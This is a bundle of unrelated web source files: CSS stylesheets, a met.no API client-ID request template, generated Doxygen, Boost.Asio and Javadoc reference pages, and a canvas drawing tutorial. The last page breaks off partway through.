.action_buttons{ overflow: hidden; clear: both; padding-bottom: 10px; } /*.pmxi_plugin .action_buttons a{ border: 1px solid #BBBBBB; -moz-border-radius: 3px; -khtml-border-radius: 3px; -webkit-border-radius: 3px; border-radius: 3px; color: #464646; cursor: pointer; font-size: 18px !important; margin-right: 10px; padding: 15px 25px; text-decoration: none; display: block; width:25px; float: left; } .pmxi_plugin .action_buttons a:hover{ background: #dfdfdf; }*/ .pmxi_plugin #current_element{ color:green; } .pmxi_plugin #current_xml{ display: none;} .pmxi_plugin #goto_element{ display: block; float: left; font-size: 18px; height: 46px; margin-right: 10px; min-width: 70px; padding-top: 5px; text-align: center; width: 70px !important; } .pmxi_plugin .choose-elements table tbody tr td{ overflow: hidden; } .pmxi_plugin #plupload-ui h3{ float: left; font-size: 13px; font-weight: normal; margin-bottom: 0; margin-top: 8px; } .pmxi_plugin #wp-content-media-buttons{ display: none; } .pmxi_plugin label{ /*-webkit-touch-callout: none; -webkit-user-select: none; -khtml-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none;*/ } .pmxi_plugin .large_button{ /*margin-left: 10px; padding: 15px 25px; border: 1px solid #C5DBEC;*/ height: 40px; line-height: 39px; margin-left: 10px; /*width: 90px;*/ } .pmxi_plugin .drag-element .assign_post{ float: left; } .pmxi_plugin .drag-element .widefat{ margin-left: 1%; width: 85%; } .pmxi_plugin .upgrade_link{ color: #21759B; } .pmxi_plugin .pmxi_stars{ display: inline-block; background: url("../img/stars.png") no-repeat; width: 125px; height: 24px; position: relative; top:10px; } .pmxi_plugin .updated_bottom{ background-color: #FFFFE0; border-color: #E6DB55; margin: 5px 0 15px; padding: 0 0.6em; -moz-border-radius: 3px 3px 3px 3px; border-radius: 3px; border-style: solid; border-width: 1px; } .pmxi_plugin .load_options{ height: 0; line-height: 0; margin: 0; padding: 0; position: relative; right: 10px; text-align: right; top: -35px; width: 100%; } .pmxi_plugin .form-field textarea{ width:80%; } /* Tabs */ .pmxi_plugin .nav-tab-wrapper{ display: none; } .pmxi_plugin h2.nav-tab-wrapper, h3.nav-tab-wrapper{ margin-bottom: 10px; } .pmxi_plugin .nav-tab{ margin-right: 0px !important; } .pmxi_plugin h2 .nav-tab{ font-size: 18px !important; } .pmxi_plugin #set_encoding{ line-height: 25px; position: relative; text-align: center; top: -10px; margin-top: -55px; } .pmxi_plugin #add_encoding{ display: none; } .pmxi_plugin #new_encoding{ border: 1px solid #BBBBBB; -moz-border-radius: 3px; -khtml-border-radius: 3px; -webkit-border-radius: 3px; border-radius: 3px; } .pmxi_plugin .options #set_encoding{ display: none; } .pmxi_plugin .set_csv_delimiter > li{ float: left; padding: 0 3px; } /*.pmxi_plugin .set_csv_delimiter > li a.delimiter_selected{ font-weight: bold; text-decoration: underline; } .pmxi_plugin .set_csv_delimiter{ float: left; padding-top: 3px; }*/ .pmxi_plugin .set_csv_delimiter{ padding-top: 5px; } .pmxi_plugin input[name="delimiter"]{ display: block; float: left; width: 25px !important; height: 25px; min-width: 25px !important; position: relative; top:-5px; padding: 0 3px; text-align: center; } .pmxi_plugin input[name="apply_delimiter"]{ border: 1px solid #BBBBBB; -moz-border-radius: 3px; -khtml-border-radius: 3px; -webkit-border-radius: 3px; border-radius: 3px; padding: 3px 5px; margin-left: 10px; position: relative; top:-4px; cursor: pointer; } .pmxi_plugin .go_to{ float: left; font-size: 23px; line-height: 38px; text-align: center; } .pmxi_plugin .fix_checkbox{ position: relative; /*top: -2px;*/ } .pmxi_plugin .newline{ line-height: 16px; } .pmxi_plugin .button-primary:hover{ font-weight: normal; } .pmxi_plugin .hndle{ padding: 7px; margin-bottom: 0px; cursor: default !important; } .pmxi_plugin .inside{ margin: 0; line-height: 20px; } .pmxi_plugin .inside input[type="text"]{ background: #fff; } .pmxi_plugin .postbox{ margin: 0; } .pmxi_plugin .txt_center{ text-align: center; } .pmxi_plugin div.meta-options{ padding: 10px 0px; } .pmxi_plugin input[name^="attribute_name"], .pmxi_plugin input[name^="variable_attribute_name"]{ width: 95% !important; } .pmxi_plugin .widefat{ background-color: #fff; border-color: #DFDFDF; } .pmxi_plugin #woocommerce-product-data{ margin-bottom: 20px; } .pmxi_plugin .set_xpath{ left: 0; padding-left: 15px; position: absolute; top: 0; }
app/views/requestCredentials.scala.html
metno/metapi-auth
@(requestForm: Form[String])(implicit messages: Messages) @import play.api.Play.current @import helper._ @import util._ <!DOCTYPE html> <html> <head> <title>data.met.no</title> <link type="image/x-icon" rel="icon" href="/images/met_favicon.png"> <link type="image/x-icon" rel="shortcut icon" href="/images/met_favicon.ico"> <link href="/stylesheets/style_default_2013.css" rel="stylesheet" type="text/css"> <link href="/stylesheets/style_layout_2013.css" rel="stylesheet" type="text/css"> <link href="/stylesheets/style_menu_2013.css" rel="stylesheet" type="text/css"> <link href="/stylesheets/paginator.css" rel="stylesheet" type="text/css"> <link href="/stylesheets/dictionary.css" rel="stylesheet" type="text/css"> </head> <div id="wrapper" class="frontpage"> <div id="header" class="clearfix"> <div id="logo"> <a href="http://met.no"><img src="/images/logo_2013_no.png" alt="met.no"></img></a> </div> @util.navbar() </div> <div id="top-line"> <div class="top-menu"> <ul> <li><a href="https://data.met.no">data.met.no</a></li> </ul> </div> </div> <div id="main-content" class="frontpage clearfix"> <h1>Request New API Client ID</h1> <p>To gain access to the <a href="/">data.met.no</a> web services, register with your email address to generate a new API Client ID.</p> <div id="swagger-form"> <p> @form(action = controllers.auth.routes.AuthorizationController.newClientIdRequest, 'class -> "new_clientid") { @inputText(requestForm("email"), 'id -> "user_email", 'name -> "e-mail", 'value -> "e-mail") <button type="submit">Submit</button> } </p> </div> <p>We require an API client ID in order to provide all users of this free service with as stable and fast performance as the backend allows. The email given here will be used to contact you to inform about or resolve API maintenance issues.</p> <h2>Submit your email address</h2> <ul> <li>Enter your email address into the field above.</li> <li>Click on the Submit button.</li> </ul> <h2>Save your API client ID</h2> <ul> <li>You will be taken to a page with an API Client ID and a client secret. Save both of these codes in a secure location.</li> </ul> <h2>Start using <a href="/">data.met.no</a></h2> <ul> <li>Go to the <a href="/reference">API Reference</a> and copy your API Client ID into the Client ID form. Experiment with the API resources to mine data from <a href="/">data.met.no</a>. </li> </ul> </div> </body> </html>
doc/html/namespaceQt.html
laurynasl/gerpgr
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1"> <title>gerpgr: Qt Namespace Reference</title> <link href="doxygen.css" rel="stylesheet" type="text/css"> </head><body> <!-- Generated by Doxygen 1.4.4 --> <div class="qindex"><a class="qindex" href="index.html">Main&nbsp;Page</a> | <a class="qindex" href="namespaces.html">Namespace List</a> | <a class="qindex" href="hierarchy.html">Class&nbsp;Hierarchy</a> | <a class="qindex" href="annotated.html">Class&nbsp;List</a> | <a class="qindex" href="dirs.html">Directories</a> | <a class="qindex" href="files.html">File&nbsp;List</a> | <a class="qindex" href="functions.html">Class&nbsp;Members</a> | <a class="qindex" href="globals.html">File&nbsp;Members</a> | <a class="qindex" href="pages.html">Related&nbsp;Pages</a></div> <h1>Qt Namespace Reference</h1> <p> <table border="0" cellpadding="0" cellspacing="0"> <tr><td></td></tr> </table> <hr size="1"><address style="align: right;"><small>Generated on Mon Nov 13 22:26:10 2006 for gerpgr by&nbsp; <a href="http://www.doxygen.org/index.html"> <img src="doxygen.png" alt="doxygen" align="middle" border="0"></a> 1.4.4 </small></address> </body> </html>
boost/doc/html/boost_asio/reference/basic_seq_packet_socket/connect/overload1.html
geodynamics/gale
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>basic_seq_packet_socket::connect (1 of 2 overloads)</title> <link rel="stylesheet" href="../../../../../../doc/src/boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.76.1"> <link rel="home" href="../../../../boost_asio.html" title="Boost.Asio"> <link rel="up" href="../connect.html" title="basic_seq_packet_socket::connect"> <link rel="prev" href="../connect.html" title="basic_seq_packet_socket::connect"> <link rel="next" href="overload2.html" title="basic_seq_packet_socket::connect (2 of 2 overloads)"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table cellpadding="2" width="100%"><tr> <td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../../boost.png"></td> <td align="center"><a href="../../../../../../index.html">Home</a></td> <td align="center"><a href="../../../../../../libs/libraries.htm">Libraries</a></td> <td align="center"><a href="http://www.boost.org/users/people.html">People</a></td> <td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td> <td align="center"><a href="../../../../../../more/index.htm">More</a></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="../connect.html"><img src="../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../connect.html"><img src="../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../../boost_asio.html"><img src="../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="overload2.html"><img src="../../../../../../doc/src/images/next.png" alt="Next"></a> </div> <div class="section"> <div class="titlepage"><div><div><h5 class="title"> <a name="boost_asio.reference.basic_seq_packet_socket.connect.overload1"></a><a class="link" href="overload1.html" title="basic_seq_packet_socket::connect (1 of 2 overloads)">basic_seq_packet_socket::connect (1 of 2 overloads)</a> </h5></div></div></div> <p> <span class="emphasis"><em>Inherited from basic_socket.</em></span> </p> <p> Connect the socket to the specified endpoint. </p> <pre class="programlisting"><span class="keyword">void</span> <span class="identifier">connect</span><span class="special">(</span> <span class="keyword">const</span> <span class="identifier">endpoint_type</span> <span class="special">&amp;</span> <span class="identifier">peer_endpoint</span><span class="special">);</span> </pre> <p> This function is used to connect a socket to the specified remote endpoint. The function call will block until the connection is successfully made or an error occurs. </p> <p> The socket is automatically opened if it is not already open. If the connect fails, and the socket was automatically opened, the socket is not returned to the closed state. </p> <a name="boost_asio.reference.basic_seq_packet_socket.connect.overload1.parameters"></a><h6> <a name="boost_asio.reference.basic_seq_packet_socket.connect.overload1.parameters-heading"></a> <a class="link" href="overload1.html#boost_asio.reference.basic_seq_packet_socket.connect.overload1.parameters">Parameters</a> </h6> <div class="variablelist"> <p class="title"><b></b></p> <dl> <dt><span class="term">peer_endpoint</span></dt> <dd><p> The remote endpoint to which the socket will be connected. </p></dd> </dl> </div> <a name="boost_asio.reference.basic_seq_packet_socket.connect.overload1.exceptions"></a><h6> <a name="boost_asio.reference.basic_seq_packet_socket.connect.overload1.exceptions-heading"></a> <a class="link" href="overload1.html#boost_asio.reference.basic_seq_packet_socket.connect.overload1.exceptions">Exceptions</a> </h6> <div class="variablelist"> <p class="title"><b></b></p> <dl> <dt><span class="term">boost::system::system_error</span></dt> <dd><p> Thrown on failure. </p></dd> </dl> </div> <a name="boost_asio.reference.basic_seq_packet_socket.connect.overload1.example"></a><h6> <a name="boost_asio.reference.basic_seq_packet_socket.connect.overload1.example-heading"></a> <a class="link" href="overload1.html#boost_asio.reference.basic_seq_packet_socket.connect.overload1.example">Example</a> </h6> <pre class="programlisting"><span class="identifier">boost</span><span class="special">::</span><span class="identifier">asio</span><span class="special">::</span><span class="identifier">ip</span><span class="special">::</span><span class="identifier">tcp</span><span class="special">::</span><span class="identifier">socket</span> <span class="identifier">socket</span><span class="special">(</span><span class="identifier">io_service</span><span class="special">);</span> <span class="identifier">boost</span><span class="special">::</span><span class="identifier">asio</span><span class="special">::</span><span class="identifier">ip</span><span class="special">::</span><span class="identifier">tcp</span><span class="special">::</span><span class="identifier">endpoint</span> <span class="identifier">endpoint</span><span class="special">(</span> <span class="identifier">boost</span><span class="special">::</span><span class="identifier">asio</span><span class="special">::</span><span class="identifier">ip</span><span class="special">::</span><span class="identifier">address</span><span class="special">::</span><span class="identifier">from_string</span><span class="special">(</span><span class="string">"1.2.3.4"</span><span class="special">),</span> <span class="number">12345</span><span class="special">);</span> <span class="identifier">socket</span><span class="special">.</span><span class="identifier">connect</span><span class="special">(</span><span class="identifier">endpoint</span><span class="special">);</span> </pre> </div> <table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr> <td align="left"></td> <td align="right"><div class="copyright-footer">Copyright &#169; 2003-2011 Christopher M. Kohlhoff<p> Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>) </p> </div></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="../connect.html"><img src="../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../connect.html"><img src="../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../../boost_asio.html"><img src="../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="overload2.html"><img src="../../../../../../doc/src/images/next.png" alt="Next"></a> </div> </body> </html>
js/granada/jquery/selectbox/css/selectbox.css
miguelangelramirez/magento.dev
.selectbox { vertical-align: middle; cursor: pointer; margin-top: 0px; z-index: 1; font-family: "Lato", "Helvetica Neue", Helvetica, Arial, sans-serif; text-transform: uppercase; } .selectbox .select { height: 24px; padding: 0 20px 0 10px; color: #ddd; transition: color 200ms ease-in-out; -webkit-transition: color 200ms ease-in-out; -moz-transition: color 200ms ease-in-out; -o-transition: color 200ms ease-in-out; } .selectbox:hover .select { color: #fff; } .selectbox .select:active { } .selectbox.focused .select { } .selectbox .select .text { display: block; width: 100%; white-space: nowrap; text-overflow: ellipsis; overflow: hidden; font-size: 11px; font-weight: 700; line-height: 24px; } .selectbox .select .text img { margin: 7px 6px 0 0; display: inline-block; width: 16px; height: 11px; } .selectbox .trigger { position: absolute; top: 0; right: 0; width: 24px; height: 100%; } .selectbox .trigger .arrow { display: inline-block; width: 0; height: 0; vertical-align: middle; border-top: 4px solid #fff; border-right: 4px solid transparent; border-bottom: 0 dotted; border-left: 4px solid transparent; margin-top: 2px; } .selectbox:hover .arrow { background-position: center -6px; } .selectbox .dropdown { top: auto; } .selectbox .dropdown ul { top: auto; margin: 0; margin-top: 5px; padding: 4px 0; background: #f5f5f5; box-shadow: 0 0 3px rgba(0,0,0,0.4); -webkit-box-shadow: 0 0 3px rgba(0,0,0,0.4); -moz-box-shadow: 0 0 3px rgba(0,0,0,0.4); text-align: left; border-radius: 2px; -webkit-border-radius: 2px; -moz-border-radius: 2px; margin-left: 1px; margin-right: 1px; margin-bottom: 8px; } body.kallyas-dark .selectbox .dropdown ul { background: #111; } .selectbox .dropdown ul:before { content: ""; top: -4px; position: absolute; left: 9px; border: 5px solid transparent; border-bottom-width: 4px; border-bottom-color: #f5f5f5; } body.kallyas-dark .selectbox .dropdown ul:before { border-bottom-color: #111; } .selectbox .dropdown.top-dropdown ul:before { content: ""; top: auto; bottom: 0; position: absolute; left: 9px; border: 5px solid transparent; border-bottom-width: 4px; border-bottom-color: transparent; border-top-width: 4px; border-top-color: #f5f5f5; } body.kallyas-dark .selectbox .dropdown.top-dropdown ul:before { border-bottom-color: transparent; border-top-color: #111; } .selectbox ul { margin-bottom: 0; } .selectbox li { padding: 0 10px; color: #555; display: block; transition: background-color 200ms ease-in-out; -webkit-transition: background-color 200ms ease-in-out; -moz-transition: background-color 200ms ease-in-out; -o-transition: background-color 200ms ease-in-out; } .selectbox li:hover { background: #dedede; } body.kallyas-dark .selectbox li:hover { background: #555; } .selectbox li.disabled { } .selectbox li.disabled:hover { } .selectbox li a { color: #222; text-decoration: none; display: block; padding: 0; background-color: transparent; border: 0; border-radius: 0; font-size: 10px; font-family: 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif; } body.kallyas-dark .selectbox li a { color: #ccc; } .selectbox li a:hover {background-color: transparent;} .selectbox li a img { margin: 4px 6px 0 0; display: inline-block; width: 16px; height: 11px; } .selectbox.default .select { background: #ececec; cursor: pointer; border: solid #CAC9C9 1px; border-radius: 3px; -webkit-border-radius: 3px; -moz-border-radius: 3px; font-size: 10px; padding: 0px 30px 0px 0px; text-transform: uppercase; font-weight: bold; line-height: 1; height: 30px; -webkit-box-shadow: 0px 2px 2px rgba(0,0,0,0.027),inset 0px 1px 0px rgba(255,255,255,0.69),inset 0px -1px 0px rgba(0,0,0,0.0187),inset 0px 16px 15px rgba(255,255,255,0.57); -moz-box-shadow: 0px 2px 2px rgba(0,0,0,0.027),inset 0px 1px 0px rgba(255,255,255,0.69),inset 0px -1px 0px rgba(0,0,0,0.0187),inset 0px 16px 15px rgba(255,255,255,0.57); -o-box-shadow: 0px 2px 2px rgba(0,0,0,0.027),inset 0px 1px 0px rgba(255,255,255,0.69),inset 0px -1px 0px rgba(0,0,0,0.0187),inset 0px 16px 15px rgba(255,255,255,0.57); box-shadow: 0px 2px 2px rgba(0,0,0,0.027),inset 0px 1px 0px rgba(255,255,255,0.69),inset 0px -1px 0px rgba(0,0,0,0.0187),inset 0px 16px 15px rgba(255,255,255,0.57); } .selectbox.default .trigger .arrow { border-top-color: #999; margin-left: -4px; margin-top: 2px; } .selectbox.default .trigger:before { display: inline-block; width: 0; height: 0; vertical-align: middle; border-top: 4px solid transparent; border-right: 4px solid transparent; border-bottom: 4px solid #ccc; border-left: 4px solid transparent; } .selectbox.default:hover .select { -webkit-box-shadow: 0px 2px 2px rgba(0,0,0,0.027),inset 0px 1px 0px rgba(255,255,255,0.69),inset 0px -1px 0px rgba(0,0,0,0.0187),inset 0px 16px 15px rgba(255,255,255,0.75); -moz-box-shadow: 0px 2px 2px rgba(0,0,0,0.027),inset 0px 1px 0px rgba(255,255,255,0.69),inset 0px -1px 0px rgba(0,0,0,0.0187),inset 0px 16px 15px rgba(255,255,255,0.75); -o-box-shadow: 0px 2px 2px rgba(0,0,0,0.027),inset 0px 1px 0px rgba(255,255,255,0.69),inset 0px -1px 0px rgba(0,0,0,0.0187),inset 0px 16px 15px rgba(255,255,255,0.75); box-shadow: 0px 2px 2px rgba(0,0,0,0.027),inset 0px 1px 0px rgba(255,255,255,0.69),inset 0px -1px 0px rgba(0,0,0,0.0187),inset 0px 16px 15px rgba(255,255,255,0.75); } .selectbox.default .select .text { padding: 0 10px; font-family: "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 10px; color: #666; text-shadow: 0 1px 0 rgba(255,255,255,0.59); line-height: 28px;} .selectbox.default:hover .select .text { color: #888; text-shadow: 0 1px 0 rgba(255,255,255,0.69); } .selectbox.default .trigger { width: 0; height: 0; border: 4px solid transparent; border-bottom-color: #999; margin-right: 9px; margin-top: 5px; } .selectbox.default .dropdown ul { margin-top: 1px; margin-bottom: 1px; background: #fafafa; } .selectbox.default .dropdown ul:before { display: none; }
misc/my/php/mail.html
taichiman/The-Car-Store
<!DOCTYPE html> <html> <head> </head> <body> Hi <?php echo 'Hello!'; ?> </body> </html>
Interficies/canvas/Canvas_1/canvasFace.html
olsesacl/2DAW
<html> <head> <title>Canvas tutorial</title> <script type="text/javascript"> function draw() { var canvas = document.getElementById('canvas'); if (canvas.getContext){ var ctx = canvas.getContext('2d'); ctx.beginPath(); ctx.arc(75,75,50,0,Math.PI*2,true); // Outer circle ctx.moveTo(110,75); ctx.arc(75,75,35,0,Math.PI,false); // Mouth (clockwise) ctx.moveTo(65,65); ctx.arc(60,65,5,0,Math.PI*2,true); // Left eye ctx.moveTo(95,65); ctx.arc(90,65,5,0,Math.PI*2,true); // Right eye ctx.stroke(); } } </script> <style type="text/css"> canvas { border: 1px solid black; } </style> </head> <body onload="draw();"> <canvas id="canvas" width="150" height="150"></canvas> </body> </html>
1.7.10_Forge_Documents/net/minecraft/client/renderer/tileentity/TileEntityChestRenderer.html
Gullanshire/Minecraft_Mod-The_Exorcist
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_65) on Sun Jan 11 16:07:00 EST 2015 --> <title>TileEntityChestRenderer (Forge API)</title> <meta name="date" content="2015-01-11"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="TileEntityChestRenderer (Forge API)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntityBeaconRenderer.html" title="class in net.minecraft.client.renderer.tileentity"><span class="strong">Prev Class</span></a></li> <li><a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntityEnderChestRenderer.html" title="class in net.minecraft.client.renderer.tileentity"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?net/minecraft/client/renderer/tileentity/TileEntityChestRenderer.html" target="_top">Frames</a></li> <li><a href="TileEntityChestRenderer.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#fields_inherited_from_class_net.minecraft.client.renderer.tileentity.TileEntitySpecialRenderer">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor_summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor_detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">net.minecraft.client.renderer.tileentity</div> <h2 title="Class TileEntityChestRenderer" class="title">Class TileEntityChestRenderer</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li>java.lang.Object</li> <li> <ul class="inheritance"> <li><a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntitySpecialRenderer.html" title="class in net.minecraft.client.renderer.tileentity">net.minecraft.client.renderer.tileentity.TileEntitySpecialRenderer</a></li> <li> <ul class="inheritance"> <li>net.minecraft.client.renderer.tileentity.TileEntityChestRenderer</li> </ul> </li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <hr> <br> <pre>public class <span class="strong">TileEntityChestRenderer</span> extends <a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntitySpecialRenderer.html" title="class in net.minecraft.client.renderer.tileentity">TileEntitySpecialRenderer</a></pre> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== FIELD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="field_summary"> <!-- --> </a> <h3>Field Summary</h3> <ul class="blockList"> <li class="blockList"><a name="fields_inherited_from_class_net.minecraft.client.renderer.tileentity.TileEntitySpecialRenderer"> <!-- --> </a> <h3>Fields inherited from class&nbsp;net.minecraft.client.renderer.tileentity.<a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntitySpecialRenderer.html" title="class in net.minecraft.client.renderer.tileentity">TileEntitySpecialRenderer</a></h3> <code><a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntitySpecialRenderer.html#field_147501_a">field_147501_a</a></code></li> </ul> </li> </ul> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor_summary"> <!-- --> </a> <h3>Constructor Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation"> <caption><span>Constructors</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Constructor and Description</th> </tr> <tr class="altColor"> <td class="colOne"><code><strong><a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntityChestRenderer.html#TileEntityChestRenderer()">TileEntityChestRenderer</a></strong>()</code>&nbsp;</td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method_summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span>Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><strong><a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntityChestRenderer.html#renderTileEntityAt(net.minecraft.tileentity.TileEntityChest,%20double,%20double,%20double,%20float)">renderTileEntityAt</a></strong>(<a href="../../../../../net/minecraft/tileentity/TileEntityChest.html" title="class in net.minecraft.tileentity">TileEntityChest</a>&nbsp;p_147500_1_, double&nbsp;p_147500_2_, double&nbsp;p_147500_4_, double&nbsp;p_147500_6_, float&nbsp;p_147500_8_)</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><strong><a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntityChestRenderer.html#renderTileEntityAt(net.minecraft.tileentity.TileEntity,%20double,%20double,%20double,%20float)">renderTileEntityAt</a></strong>(<a href="../../../../../net/minecraft/tileentity/TileEntity.html" title="class in net.minecraft.tileentity">TileEntity</a>&nbsp;p_147500_1_, double&nbsp;p_147500_2_, double&nbsp;p_147500_4_, double&nbsp;p_147500_6_, float&nbsp;p_147500_8_)</code>&nbsp;</td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods_inherited_from_class_net.minecraft.client.renderer.tileentity.TileEntitySpecialRenderer"> <!-- --> </a> <h3>Methods inherited from class&nbsp;net.minecraft.client.renderer.tileentity.<a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntitySpecialRenderer.html" title="class in net.minecraft.client.renderer.tileentity">TileEntitySpecialRenderer</a></h3> <code><a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntitySpecialRenderer.html#bindTexture(net.minecraft.util.ResourceLocation)">bindTexture</a>, <a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntitySpecialRenderer.html#func_147496_a(net.minecraft.world.World)">func_147496_a</a>, <a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntitySpecialRenderer.html#func_147497_a(net.minecraft.client.renderer.tileentity.TileEntityRendererDispatcher)">func_147497_a</a>, <a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntitySpecialRenderer.html#func_147498_b()">func_147498_b</a></code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="methods_inherited_from_class_java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Object</h3> <code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ========= CONSTRUCTOR DETAIL ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor_detail"> <!-- --> </a> <h3>Constructor Detail</h3> <a name="TileEntityChestRenderer()"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>TileEntityChestRenderer</h4> <pre>public&nbsp;TileEntityChestRenderer()</pre> </li> </ul> </li> </ul> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method_detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="renderTileEntityAt(net.minecraft.tileentity.TileEntityChest, double, double, double, float)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>renderTileEntityAt</h4> <pre>public&nbsp;void&nbsp;renderTileEntityAt(<a href="../../../../../net/minecraft/tileentity/TileEntityChest.html" title="class in net.minecraft.tileentity">TileEntityChest</a>&nbsp;p_147500_1_, double&nbsp;p_147500_2_, double&nbsp;p_147500_4_, double&nbsp;p_147500_6_, float&nbsp;p_147500_8_)</pre> </li> </ul> <a name="renderTileEntityAt(net.minecraft.tileentity.TileEntity, double, double, double, float)"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>renderTileEntityAt</h4> <pre>public&nbsp;void&nbsp;renderTileEntityAt(<a href="../../../../../net/minecraft/tileentity/TileEntity.html" title="class in net.minecraft.tileentity">TileEntity</a>&nbsp;p_147500_1_, double&nbsp;p_147500_2_, double&nbsp;p_147500_4_, double&nbsp;p_147500_6_, float&nbsp;p_147500_8_)</pre> <dl> <dt><strong>Specified by:</strong></dt> <dd><code><a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntitySpecialRenderer.html#renderTileEntityAt(net.minecraft.tileentity.TileEntity,%20double,%20double,%20double,%20float)">renderTileEntityAt</a></code>&nbsp;in class&nbsp;<code><a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntitySpecialRenderer.html" title="class in net.minecraft.client.renderer.tileentity">TileEntitySpecialRenderer</a></code></dd> 